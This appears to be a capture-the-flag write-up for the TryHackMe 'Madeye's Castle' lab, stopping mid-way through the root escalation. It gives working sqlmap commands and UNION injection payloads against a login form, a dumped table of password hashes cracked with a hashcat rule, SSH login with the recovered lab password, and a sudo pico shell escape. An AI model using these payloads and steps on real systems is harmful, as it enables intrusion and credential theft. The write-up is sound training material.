- Name: Madeye's Castle
- Profile:
- Difficulty: Medium
- Description: A boot2root box that is modified from a box used in CuCTF by the team at
Install tools used in this WU on BlackArch Linux:
$ sudo pacman -S nmap ffuf smbmap sqlmap hashcat gtfoblookup
Network enumeration#
Port and service scan with nmap:
# Nmap 7.91 scan initiated Mon May 10 17:12:54 2021 as: nmap -sSVC -p- -oA nmap_full -v
Nmap scan report for
Host is up (0.031s latency).
Not shown: 65531 filtered ports
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7f:5f:48:fa:3d:3e:e6:9c:23:94:33:d1:8d:22:b4:7a (RSA)
| 256 53:75:a7:4a:a8:aa:46:66:6a:12:8c:cd:c2:6f:39:aa (ECDSA)
|_ 256 7f:c2:2f:3d:64:d9:0a:50:74:60:36:03:98:00:75:98 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: Amazingly It works
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: HOGWARTZ-CASTLE; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| nbstat: NetBIOS name: HOGWARTZ-CASTLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| HOGWARTZ-CASTLE<00> Flags: <unique><active>
| HOGWARTZ-CASTLE<03> Flags: <unique><active>
| HOGWARTZ-CASTLE<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: hogwartz-castle
| NetBIOS computer name: HOGWARTZ-CASTLE\x00
| Domain name: \x00
| FQDN: hogwartz-castle
|_ System time: 2021-05-10T15:17:34+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-10T15:17:34
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
# Nmap done at Mon May 10 17:18:14 2021 -- 1 IP address (1 host up) scanned in 320.03 seconds
Let's add a domain:
$ grep madeyescastle /etc/hosts madeyescastle.thm
Web enumeration#
At http://madeyescastle.thm/ there is only the Apache2 default page so let's enumerate.
$ ffuf -u http://madeyescastle.thm/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
backup [Status: 301, Size: 323, Words: 20, Lines: 10]
server-status [Status: 403, Size: 282, Words: 20, Lines: 10]
There is a backup folder but no directory listing so let's enumerate files.
$ ffuf -u http://madeyescastle.thm/backup/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-d-files-lowercase.txt -fc 403
I found no files so there is maybe a sub-directory.
$ ffuf -u http://madeyescastle.thm/backup/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
email [Status: 200, Size: 1527, Words: 236, Lines: 44]
It was a file but without extension: http://madeyescastle.thm/backup/email
It is done. I registered the name you requested below but changed the "s" to a "z". You should be good to go.
On Tue, Nov 24, 2020 at 8:54 AM Madeye Moody <> wrote:
Mr. Roar M. Echo,
Sounds great! Thanks, your mentorship is exactly what we need to avoid legal troubles with the Ministry of Magic.
Magically Yours,
On Tue, Nov 24, 2020 at 8:53 AM Roar May Echo <> wrote:
I don't think we can do "hogwarts" due to copyright issues, but let’s go with "hogwartz", how does that sound?
On Tue, Nov 24, 2020 at 8:52 AM Madeye Moody <> wrote:
Dear Mr. Echo,
Thanks so much for helping me develop my castle for TryHackMe. I think it would be great to register the domain name of "hogwarts-castle.thm" for the box. I have been reading about virtual hosting in Apache and it's a great way to host multiple domains on the same server. The docs says that...
> The term Virtual Host refers to the practice of running more than one web site (such as
> and on a single machine. Virtual hosts can be
> "IP-based", meaning that you have a different IP address for every web site, or "name-based",
> meaning that you have multiple names running on each IP address. The fact that they are
> running on the same physical server is not apparent to the end user.
You can read more here:
What do you think?
The domain of the vhost should be hogwartz-castle.thm
, we just have to add it:
$ grep madeyescastle /etc/hosts madeyescastle.thm hogwartz-castle.thm
Browsing http://hogwartz-castle.thm/ we now have a login form but we don't have a clue of any credentials.
Enumerating with ffuf
gave nothing.
SMB enumeration#
Let's try to enumerate SMB then:
$ smbmap --no-banner -H hogwartz-castle.thm
[+] IP: hogwartz-castle.thm:445 Name: unknown Status: Guest session
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
sambashare READ ONLY Harry's Important Files
IPC$ NO ACCESS IPC Service (hogwartz-castle server (Samba, Ubuntu))
We can mount the RO share sambashare
with xdg-open smb://hogwartz-castle.thm/
And retrieve 2 files: spellnames.txt
(list of words) and .notes
containing 2
Hagrid told me that spells names are not good since they will not "rock you"
Hermonine loves historical text editors along with reading old books.
This seems like a stupid rabbit hole since BF using harry
, hagrid
doesn't work over HTTP form, SSH or SMB using that wordlist.
Ok the hint said spells names are not good
but a wordlist + mentioning
rockyou is an invitation to BF.
Web exploitation: SQL injection#
The login form is SQL injectable.
sqlmap is able to exploit it but since the app has a weird behavior it always retrieves a table full of null values.
$ sqlmap -u 'http://hogwartz-castle.thm/login' --random-agent --method POST --data 'user=Harry&password=pass' -p user --skip passwrd --level 5 --risk 3 --dbms SQLite --dump -T users -C name,password,admin,notes --flush-session --threads 10 --no-cast --tamper unionalltounion --union-char 1337
$ sqlmap -u 'http://hogwartz-castle.thm/login' --random-agent --method POST --data 'user=Harry&password=pass' -p user --skip passwrd --level 5 --risk 3 --dbms SQLite --dump -T users -C notes --threads 10 --no-cast --tamper unionalltounion --union-char 1337 --flush-session -v 7
But if instead of telling SQLmap to dump the 4 columns -C name,password,admin,notes
we only ask it to retrieve one at a time (eg. -C notes
) it actually works but
it retrieves one row instead of 40.
Database: <current>
Table: users
[1 entry]
| notes |
| contact administrator. Congrats on SQL injection... keep digging |
But by putting a very high verbosity -v 7
We can see the following request is
performed, using a JSON_GROUP_ARRAY
[10:24:59] [PAYLOAD] Harry' UNION SELECT 'qbpjq'||JSON_GROUP_ARRAY(COALESCE(notes,' '))||'qzxxq',1337,1337,1337 FROM users-- DFtg
Where the answer received contains all values but in an escaped JSON array inside a JSON error:
{"error":"The password for qbpjq[\"contact administrator. Congrats on SQL injection... keep digging\",\"My linux username is my first name, and password uses best64\",\" contact administrator. Congrats on SQL injection... keep digging\"
,\"contact administrator. Congrats on SQL injection... keep digging\",\"contact administrator. Congrats on SQL injection... keep digging\",\"contact administrator. Congrats on SQL injection... keep digging\",\" contact administrator. Co
ngrats on SQL injection... keep digging\",\" contact administrator. Congrats on SQL injection... keep digging\",\" contact administrator. Congrats on SQL injection... keep digging\",\" contact administrator. Congrats on SQL injection...
keep digging\",\" contact administrator. Congrats on SQL injection... keep digging\",\" contact administrator. Congrats on SQL injection... keep digging\",\"contact administrator. Congrats on SQL injection... keep digging\",\"contact a
dministrator. Congrats on SQL injection... keep digging\",\"contact administrator. Congrats on SQL injection... keep digging\",\"contact administrator. Congrats on SQL injection... keep digging\",\"contact administrator. Congrats on SQL
injection... keep digging\",\"contact administrator. Congrats on SQL injection... keep digging\",\" contact administrator. Congrats on SQL injection... keep digging\",\" contact administrator. Congrats on SQL injection... keep digging\
",\"contact administrator. Congrats on SQL injection... keep digging\",\" contact administrator. Congrats on SQL injection... keep digging\",\" contact administrator. Congrats on SQL injection... keep digging\",\"contact administrator.
Congrats on SQL injection... keep digging\",\"contact administrator. Congrats on SQL injection... keep digging\",\"contact administrator. Congrats on SQL injection... keep digging\",\" contact administrator. Congrats on SQL injection...
keep digging\",\" contact administrator. Congrats on SQL injection... keep digging\",\" contact administrator. Congrats on SQL injection... keep digging\",\" contact administrator. Congrats on SQL injection... keep digging\",\" contact
administrator. Congrats on SQL injection... keep digging\",\"contact administrator. Congrats on SQL injection... keep digging\",\" contact administrator. Congrats on SQL injection... keep digging\",\"contact administrator. Congrats on
SQL injection... keep digging\",\" contact administrator. Congrats on SQL injection... keep digging\",\" contact administrator. Congrats on SQL injection... keep digging\",\"contact administrator. Congrats on SQL injection... keep diggi
ng\",\" contact administrator. Congrats on SQL injection... keep digging\",\"contact administrator. Congrats on SQL injection... keep digging\",\" contact administrator. Congrats on SQL injection... keep digging\"]qzxxq is incorrect! 1337"}
If we clean that a little we have:
The password for qbpjq
"contact administrator. Congrats on SQL injection... keep digging",
"My linux username is my first name, and password uses best64",
" contact administrator. Congrats on SQL injection... keep digging",
"contact administrator. Congrats on SQL injection... keep digging",
"contact administrator. Congrats on SQL injection... keep digging",
"contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
"contact administrator. Congrats on SQL injection... keep digging",
"contact administrator. Congrats on SQL injection... keep digging",
"contact administrator. Congrats on SQL injection... keep digging",
"contact administrator. Congrats on SQL injection... keep digging",
"contact administrator. Congrats on SQL injection... keep digging",
"contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
"contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
"contact administrator. Congrats on SQL injection... keep digging",
"contact administrator. Congrats on SQL injection... keep digging",
"contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
"contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
"contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
"contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging",
"contact administrator. Congrats on SQL injection... keep digging",
" contact administrator. Congrats on SQL injection... keep digging"
qzxxq is incorrect! 1337
The only interesting note is:
My linux username is my first name, and password uses best64
Now let's try fetch user names:
$ sqlmap -u 'http://hogwartz-castle.thm/login' --random-agent --method POST --data 'user=Harry&password=pass' -p user --skip passwrd --level 5 --risk 3 --dbms SQLite --dump -T users -C name --threads 10 --no-cast --tamper unionalltounion --union-char 1337 --flush-session -v 7
Database: <current>
Table: users
[1 entry]
| name |
| Aaliyah Allen |
[10:38:03] [PAYLOAD] Harry' UNION SELECT 'qxvbq'||JSON_GROUP_ARRAY(COALESCE(name,' '))||'qppjq',1337,1337,1337 FROM users-- dnjD
Raw answer:
{"error":"The password for qxvbq[\"Lucas Washington\",\"Harry Turner\",\"Andrea Phillips\",\"Liam Hernandez\",\"Adam Jenkins\",\"Landon Alexander\",\"Kennedy Anderson\",\"Sydney Wright\",\"Aaliyah Sanders\",\"Olivia Murphy\",\"Olivia Ro
ss\",\"Grace Brooks\",\"Jordan White\",\"Diego Baker\",\"Liam Ward\",\"Carlos Barnes\",\"Carlos Lopez\",\"Oliver Gonzalez\",\"Sophie Sanchez\",\"Maya Sanders\",\"Joshua Reed\",\"Aaliyah Allen\",\"Jasmine King\",\"Jonathan Long\",\"Samue
l Anderson\",\"Julian Robinson\",\"Gianna Harris\",\"Madelyn Morgan\",\"Ella Garcia\",\"Zoey Gonzales\",\"Abigail Morgan\",\"Joseph Rivera\",\"Elizabeth Cook\",\"Parker Cox\",\"Savannah Torres\",\"Aaliyah Williams\",\"Blake Washington\",\"Claire Miller\",\"Brody Stewart\",\"Kimberly Murphy\"]qppjq is incorrect! 1337"}
Cleaned answer:
The password for qxvbq
"Lucas Washington",
"Harry Turner",
"Andrea Phillips",
"Liam Hernandez",
"Adam Jenkins",
"Landon Alexander",
"Kennedy Anderson",
"Sydney Wright",
"Aaliyah Sanders",
"Olivia Murphy",
"Olivia Ross",
"Grace Brooks",
"Jordan White",
"Diego Baker",
"Liam Ward",
"Carlos Barnes",
"Carlos Lopez",
"Oliver Gonzalez",
"Sophie Sanchez",
"Maya Sanders",
"Joshua Reed",
"Aaliyah Allen",
"Jasmine King",
"Jonathan Long",
"Samue lAnderson",
"Julian Robinson",
"Gianna Harris",
"Madelyn Morgan",
"Ella Garcia",
"Zoey Gonzales",
"Abigail Morgan",
"Joseph Rivera",
"Elizabeth Cook",
"Parker Cox",
"Savannah Torres",
"Aaliyah Williams",
"Blake Washington",
"Claire Miller",
"Brody Stewart",
"Kimberly Murphy"
qppjq is incorrect! 1337
Once I tried to extract the admin
column containing boolean integers (0 or 1, but
actually only 0) I understood that was causing a casting issue. So I tried
to extract only columns returning string values -C name,password,notes
but had
the same issue (only 1st row).
Then I tried only username and password an it worked -C name,password
anyone would expect:
Database: <current>
Table: users
[40 entries]
| name | password |
| Lucas Washington | c53d7af1bbe101a6b45a3844c89c8c06d8ac24ed562f01b848cad9925c691e6f10217b6594532b9cd31aa5762d85df642530152d9adb3005fac407e2896bf492 |
| Harry Turner | b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885 |
| Andrea Phillips | e1ed732e4aa925f0bf125ae8ed17dd2d5a1487f9ff97df63523aa481072b0b5ab7e85713c07e37d9f0c6f8b1840390fc713a4350943e7409a8541f15466d8b54 |
| Liam Hernandez | 5628255048e956c9659ed4577ad15b4be4177ce9146e2a51bd6e1983ac3d5c0e451a0372407c1c7f70402c3357fc9509c24f44206987b1a31d43124f09641a8d |
| Adam Jenkins | 2317e58537e9001429caf47366532d63e4e37ecd363392a80e187771929e302922c4f9d369eda97ab7e798527f7626032c3f0c3fd19e0070168ac2a82c953f7b |
| Landon Alexander | 79d9a8bef57568364cc6b4743f8c017c2dfd8fd6d450d9045ad640ab9815f18a69a4d2418a7998b4208d509d8e8e728c654c429095c16583cbf8660b02689905 |
| Kennedy Anderson | e3c663d68c647e37c7170a45214caab9ca9a7d77b1a524c3b85cdaeaa68b2b5e740357de2508142bc915d7a16b97012925c221950fb671dd513848e33c33d22e |
| Sydney Wright | d3ccca898369a3f4cf73cbfc8daeeb08346edf688dc9b7b859e435fe36021a6845a75e4eddc7a932e38332f66524bd7876c0c613f620b2030ed2f89965823744 |
| Aaliyah Sanders | dc2a6b9462945b76f333e075be0bc2a9c87407a3577f43ba347043775a0f4b5c1a78026b420a1bf7da84f275606679e17ddc26bceae25dad65ac79645d2573c0 |
| Olivia Murphy | 6535ee9d2b8d6f2438cf92da5a00724bd2539922c83ca19befedbe57859ceafd6d7b9db83bd83c26a1e070725f6f336e21cb40295ee07d87357c34b6774dd918 |
| Olivia Ross | 93b4f8ce01b44dd25c134d0517a496595b0b081cef6eb625e7eb6662cb12dd69c6437af2ed3a5972be8b05cc14a16f46b5d11f9e27e6550911ed3d0fe656e04d |
| Grace Brooks | 9a311251255c890692dc84b7d7d66a1eefc5b89804cb74d16ff486927014d97502b2f790fbd7966d19e4fbb03b5eb7565afc9417992fc0c242870ea2fd863d6d |
| Jordan White | 5ed63206a19b036f32851def04e90b8df081071aa8ca9fb35ef71e4daf5e6c6eab3b3fea1b6e50a45a46a7aee86e4327f73a00f48deb8ae2bf752f051563cc8b |
| Diego Baker | 87ac9f90f01b4b2ae775a7cb96a8a04d7ab7530282fd76224ee03eecab9114275540e4b6a2c52e890cf11f62aacb965be0c53c48c0e51bf731d046c5c3182aad |
| Liam Ward | 88344d6b7724bc0e6e3247d4912fa755a5a91c2276e08610462f6ea005d16fd5e305dfe566e7f1dd1a98afe1abfa38df3d9697cdc47ecbb26ac4d21349d09ba7 |
| Carlos Barnes | 7f67af71e8cbb7188dd187b7da2386cc800ab8b863c9d0b2dce87c98a91b5511330a2ad4f7d73592b50a2a26c26970cfbd22f915d1967cd92569dbf5e24ac77e |
| Carlos Lopez | 8c8702dbb6de9829bcd6da8a47ab26308e9db7cb274b354e242a9811390462a51345f5101d7f081d36eea4ec199470162775c32cb1f4a96351dc385711619671 |
| Oliver Gonzalez | c809b40b7c3c0f095390f3cd96bb13864b7e8fd1670c6b1c05b1e26151be62782b97391b120cb4a8ee1d0c9b8fffaf12b44c9d084ae6041468ad5f12ec3d7a4e |
| Sophie Sanchez | 68b519187b9e2552d555cb3e9183711b939f94dfe2f71bda0172ee8402acf074cc0f000611d68d2b8e9502fa7235c8a25d72da50916ad0689e00cb4f47283e9b |
| Maya Sanders | 7eea93d53fbed3ba8f2fa3d25c5f16fe5eaff1f5371918e0845d2076a2e952a457390ad87d289bf25f9457032f14bb07dcd625d03f2f5ee5c887c09dc7107a66 |
| Joshua Reed | e49608634f7de91d19e5e1b906e10c5a4a855a4fe32521f310727c9875e823c82b3e0347b32ef49ea44657e60e771d9e326d40ab60ce3a950145f1a7a79d3124 |
| Aaliyah Allen | c063c5215b56091327a1f25e38e2d0a5e6db83cceb0ab29cbb0bedd686c18ee5770bfbbfa0a4ac542c8935b0fb63e30ea0bc0408d3523157d840fdfa54ec8dab |
| Jasmine King | 487daab566431e86172ed68f0836f3221592f91c94059a725d2fdca145f97e6258593929c37d0339ca68614a52f4df61953b930585c4968cedaaa836744c52a6 |
| Jonathan Long | 44b1fbcbcd576b8fd69bf2118a0c2b82ccf8a6a9ef2ae56e8978e6178e55b61d491f6fc152d07f97ca88c6b7532f25b8cd46279e8a2c915550d9176f19245798 |
| Samuel Anderson | a86fa315ce8ed4d8295bf6d0139f23ba80e918a54a132e214c92c76768f27ce002253834190412e33c9af4ea76befa066d5bdeb47363f228c509b812dc5d81df |
| Julian Robinson | a1f6e38be4bf9fd307efe4fe05522b8c3a9e37fc2c2930507e48cb5582d81f73814ffb543cef77b4b24a18e70e2670668d1a5b6e0b4cb34af9706890bd06bbc9 |
| Gianna Harris | 01529ec5cb2c6b0300ed8f4f3df6b282c1a68c45ff97c33d52007573774014d3f01a293a06b1f0f3eb6e90994cb2a7528d345a266203ef4cd3d9434a3a033ec0 |
| Madelyn Morgan | d17604dbb5c92b99fe38648bbe4e0a0780f2f4155d58e7d6eddd38d6eceb62ae81e5e31a0a2105de30ba5504ea9c75175a79ed23cd18abcef0c8317ba693b953 |
| Ella Garcia | ac67187c4d7e887cbaccc625209a8f7423cb4ad938ec8f50c0aa5002e02507c03930f02fab7fab971fb3f659a03cd224669b0e1d5b5a9098b2def90082dfdbd2 |
| Zoey Gonzales | 134d4410417fb1fc4bcd49abf4133b6de691de1ef0a4cdc3895581c6ad19a93737cd63cb8d177db90bd3c16e41ca04c85d778841e1206193edfebd4d6f028cdb |
| Abigail Morgan | afcaf504e02b57f9b904d93ee9c1d2e563d109e1479409d96aa064e8fa1b8ef11c92bae56ddb54972e918e04c942bb3474222f041f80b189aa0efd22f372e802 |
| Joseph Rivera | 6487592ed88c043e36f6ace6c8b6c59c13e0004f9751b0c3fdf796b1965c48607ac3cc4256cc0708e77eca8e2df35b668f5844200334300a17826c033b03fe29 |
| Elizabeth Cook | af9f594822f37da8ed0de005b940158a0837060d3300be014fe4a12420a09d5ff98883d8502a2aaffd64b05c7b5a39cdeb5c57e3005c3d7e9cadb8bb3ad39ddb |
| Parker Cox | 53e7ea6c54bea76f1d905889fbc732d04fa5d7650497d5a27acc7f754e69768078c246a160a3a16c795ab71d4b565cde8fdfbe034a400841c7d6a37bdf1dab0d |
| Savannah Torres | 11f9cd36ed06f0c166ec34ab06ab47f570a4ec3f69af98a3bb145589e4a221d11a09c785d8d3947490ae4cd6f5b5dc4eb730e4faeca2e1cf9990e35d4b136490 |
| Aaliyah Williams | 9dc90274aef30d1c017a6dc1d5e3c07c8dd6ae964bcfb95cadc0e75ca5927faa4d72eb01836b613916aea2165430fc7592b5abb19b0d0b2476f7082bfa6fb760 |
| Blake Washington | 4c968fc8f5b72fd21b50680dcddea130862c8a43721d8d605723778b836bcbbc0672d20a22874af855e113cba8878672b7e6d4fc8bf9e11bc59d5dd73eb9d10e |
| Claire Miller | d4d5f4384c9034cd2c77a6bee5b17a732f028b2a4c00344c220fc0022a1efc0195018ca054772246a8d505617d2e5ed141401a1f32b804d15389b62496b60f24 |
| Brody Stewart | 36e2de7756026a8fc9989ac7b23cc6f3996595598c9696cca772f31a065830511ac3699bdfa1355419e07fd7889a32bf5cf72d6b73c571aac60a6287d0ab8c36 |
| Kimberly Murphy | 8f45b6396c0d993a8edc2c71c004a91404adc8e226d0ccf600bf2c78d33ca60ef5439ccbb9178da5f9f0cfd66f8404e7ccacbf9bdf32db5dae5dde2933ca60e6 |
Here a classic concat (with ||
) is used instead of JSON_GROUP_ARRAY
[10:46:57] [PAYLOAD] Harry' UNION SELECT 1337,1337,1337,(SELECT 'qxjxq'||name||'esuvev'||password||'qzjqq' FROM users LIMIT 39,1)-- asUH
Returning this kind of result:
{"error":"The password for 1337 is incorrect! qxjxqJoseph Riveraesuvev6487592ed88c043e36f6ace6c8b6c59c13e0004f9751b0c3fdf796b1965c48607ac3cc4256cc0708e77eca8e2df35b668f5844200334300a17826c033b03fe29qzjqq"}
Let's save the output CSV:
$ cp /home/noraj/.local/share/sqlmap/output/hogwartz-castle.thm/dump/SQLite_masterdb/users.csv .
What is the conclusion here?
There are 13 WU for this room, 100% of them abandonned using SQLmap and done it
manually. But most of them just tried to throw a command like that
sqlmap -r request --level 5 --risk 3 --dump-all --threads 10
and said
something like "SQLmap not working, let's try manually".
What did I do?
- I persevered (tried harder) #tryharder
- I read (and always do) the SQLmap documentation/Wiki #RTFM
- I increased debug verbosity to understand the payload that were sent and the answers received #troubleshooting
What did they do?
- Some of them have tried a long time but send random option without understanding
- Some of them may have read the wiki but not enough
- None actually used
-v 7
else they would have succeeded
Conclusion, what should you do next time?
- Always try harder, it's rewarding
- Always read the documentation
- Pay attention to details
- When you don't understand what's going on, go check the logs, increase verbosity, enable debug mode, etc.
- Always try to understand what you are doing even with automatic tools, don't blindly execute automatic tools or copy answer from another write-up
Thank you for listening, that was a lesson from professor noraj.
Note: Some options I used like --tamper
or --union-char
are useless here.
Note2: One could argue "It's better to do it manually so you deeply understand all requests". Yes if it's the first time you're doing it you'll definitely learn something but when you did it manually a ton of time you expect to automate the process to save time and pain. Also manual exploitation is not guaranteed to make you learn more, for example for those blindly copy/pasting cheat-sheet payloads.
Hash cracking#
Let's prepare a file with name:password
for JtR or Hashcat:
$ cat users.csv | tr ',' ':' > hashes.txt
Here no need to try a rockyou or whatever wordlist brute-force to crack the hashes, it won't work. Remember the hint:
My linux username is my first name, and password uses best64
But first let's identify the hash type with haiti:
$ haiti c53d7af1bbe101a6b45a3844c89c8c06d8ac24ed562f01b848cad9925c691e6f10217b6594532b9cd31aa5762d85df642530152d9adb3005fac407e2896bf492
SHA-512 [HC: 1700] [JtR: raw-sha512]
SHA3-512 [HC: 17600] [JtR: raw-sha3]
SHA3-512 [HC: 17600] [JtR: dynamic_400]
Keccak-512 [HC: 18000] [JtR: raw-keccak]
BLAKE2-512 [HC: 600] [JtR: raw-blake2]
Whirlpool [HC: 6100] [JtR: whirlpool]
Skein-512 [JtR: skein-512]
So it's more likely SHA-512 and we have already the hashcat and john identifier to use.
PS: haiti is already embedded in BlackArch and Pentoo and can also be install with one command on any distro using gem
. But if you would like to see haiti on Kali or Parrot please comment the following issue on Kali Bug Tracker: ID 0006797 and Parrot Bug Tracker ID 17290.
I usually use JtR (John the Ripper, CPU based) since I don't have a dedicated GPU
on my laptop and openGL driver sucks anyway. But the hint is talking about
which is the name of a Hashcat rule.
$ ls /usr/share/doc/hashcat/rules
best64.rule dive.rule hybrid InsidePro-PasswordsPro.rule rockyou-30000.rule T0XlC-insert_space_and_special_0_F.rule T0XlCv1.rule toggles3.rule unix-ninja-leetspeak.rule
combinator.rule generated2.rule Incisive-leetspeak.rule leetspeak.rule specific.rule T0XlC-insert_top_100_passwords_1_G.rule toggles1.rule toggles4.rule
d3ad0ne.rule generated.rule InsidePro-HashManager.rule oscommerce.rule T0XlC-insert_00-99_1950-2050_toprules_0_F.rule T0XlC.rule toggles2.rule toggles5.rule
PS: If you want to learn more about hash cracking please do the Crack The Hash Level 2 THM room I created.
JtR works well with a file containing user:pass
but not Hashcat so let's adapt
something Hashcat will accept:
$ cat hashes.txt| cut -d ':' -f 2 > hashes2.txt
We can then run hashcat providing the hashes to crack hashes2.txt
, the wordlist to
use spellnames.txt
and the rule to apply on the wordlist -r /usr/share/doc/hashcat/rules/best64.rule
$ hashcat --force -m 1700 hashes2.txt spellnames.txt -r /usr/share/doc/hashcat/rules/best64.rule
We have the password, let's find back what was the username:
$ grep b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885 hashes.txt | cut -d ':' -f 1
Harry Turner
We were told the linux username was the first name of the user so the credentials
are harry
/ wingardiumleviosa123
System enumeration#
We can connect via SSH now:
$ ssh harry@hogwartz-castle.thm
The authenticity of host 'hogwartz-castle.thm (' can't be established.
ED25519 key fingerprint is SHA256:aoBkBWztoybmKKG6fmaF81L3u4vOoka0W8OgIKh3E7Y.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'hogwartz-castle.thm' (ED25519) to the list of known hosts.
harry@hogwartz-castle.thm's password:
_ __ __ __ __ __ __
| | /| / /__ / /______ __ _ ___ / /____ / // /__ ___ __ _____ _____/ /____
| |/ |/ / -_) / __/ _ \/ ' \/ -_) / __/ _ \ / _ / _ \/ _ `/ |/|/ / _ `/ __/ __/_ /
|__/|__/\__/_/\__/\___/_/_/_/\__/ \__/\___/ /_//_/\___/\_, /|__,__/\_,_/_/ \__//__/
Last login: Thu Nov 26 01:42:18 2020
Basic foothold:
harry@hogwartz-castle:~$ id
uid=1001(harry) gid=1001(harry) groups=1001(harry)
harry@hogwartz-castle:~$ ls -lhA
total 24K
lrwxrwxrwx 1 root root 9 Nov 26 01:06 .bash_history -> /dev/null
-rw-r----- 1 harry harry 220 Apr 4 2018 .bash_logout
-rw-r----- 1 harry harry 3.7K Apr 4 2018 .bashrc
drwx------ 2 harry harry 4.0K Nov 26 01:17 .cache
drwx------ 3 harry harry 4.0K Nov 26 01:17 .gnupg
-rw-r----- 1 harry harry 807 Apr 4 2018 .profile
-rw-r----- 1 harry harry 40 Nov 26 01:06 user1.txt
harry@hogwartz-castle:~$ cat user1.txt
So we can find something very suspicious from the start:
harry@hogwartz-castle:~$ sudo -l
[sudo] password for harry:
Matching Defaults entries for harry on hogwartz-castle:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User harry may run the following commands on hogwartz-castle:
(hermonine) /usr/bin/pico
(hermonine) /usr/bin/pico
Elevation of Privilege (EoP): from harry to hermonine#
My prefered way to quickly check GTFObin is by using gtfoblookup
$ gtfoblookup linux sudo pico
Code: sudo pico
reset; sh 1>&0 2>&0
By running sudo -u hermonine /usr/bin/pico
and executing the GTFO steps we
have a shell as hermonine:
$ id
uid=1002(hermonine) gid=1002(hermonine) groups=1002(hermonine)
$ cd /home/hermonine
$ cat user2.txt
$ ls -lhA
total 32K
lrwxrwxrwx 1 root root 9 Nov 26 01:06 .bash_history -> /dev/null
-rw-r----- 1 hermonine hermonine 220 Apr 4 2018 .bash_logout
-rw-r----- 1 hermonine hermonine 3.7K Apr 4 2018 .bashrc
drwx------ 2 hermonine hermonine 4.0K Nov 26 01:29 .cache
drwx------ 3 hermonine hermonine 4.0K Nov 26 01:29 .gnupg
-rw-r----- 1 hermonine hermonine 807 Apr 4 2018 .profile
-rw------- 1 hermonine hermonine 36 Nov 26 01:23 .python_history
drwxr-x--- 2 hermonine hermonine 4.0K Nov 26 00:57 .ssh
-rw-r----- 1 hermonine hermonine 45 Nov 26 01:06 user2.txt
Elevation of Privilege (EoP): from hermonine to root#
Looking for SUID files I found an unusual swagger
$ find / -perm -u=s -type f 2>/dev/null
$ ls -lhA /srv/time-turner/swagger
-rwsr-xr-x 1 root root 8.7K Nov 26 01:06 /srv/time-turner/swagger
It looks like a weird binary asking to guess a random number.
$ /srv/time-turner/swagger
Guess my number: 8
Nope, that is not what I was thinking
I was thinking of 1860847828
$ /srv/time-turner/swagger
Guess my number: 8
Nope, that is not what I was thinking
I was thinking of 1908602051
It is using setuid
, is dynamically linked and is not stripped:
$ file /srv/time-turner/swagger
/srv/time-turner/swagger: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/, for GNU/Linux 3.2.0, BuildID[sha1]=36c89f8b196c651950f369719ff6e50f1b427ff8, not stripped
I won't pretend to do some reverse engineering I just executed string:
$ strings /srv/time-turner/swagger | head -50
Nice use of the time-turner!
This system architecture is
uname -p
Guess my number:
Nope, that is not what I was thinking
I was thinking of %d
GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
This part looks interesting:
Nice use of the time-turner!
This system architecture is
uname -p
Guess my number:
Nope, that is not what I was thinking
I was thinking of %d
It seems if we correctly guess the number it will return:
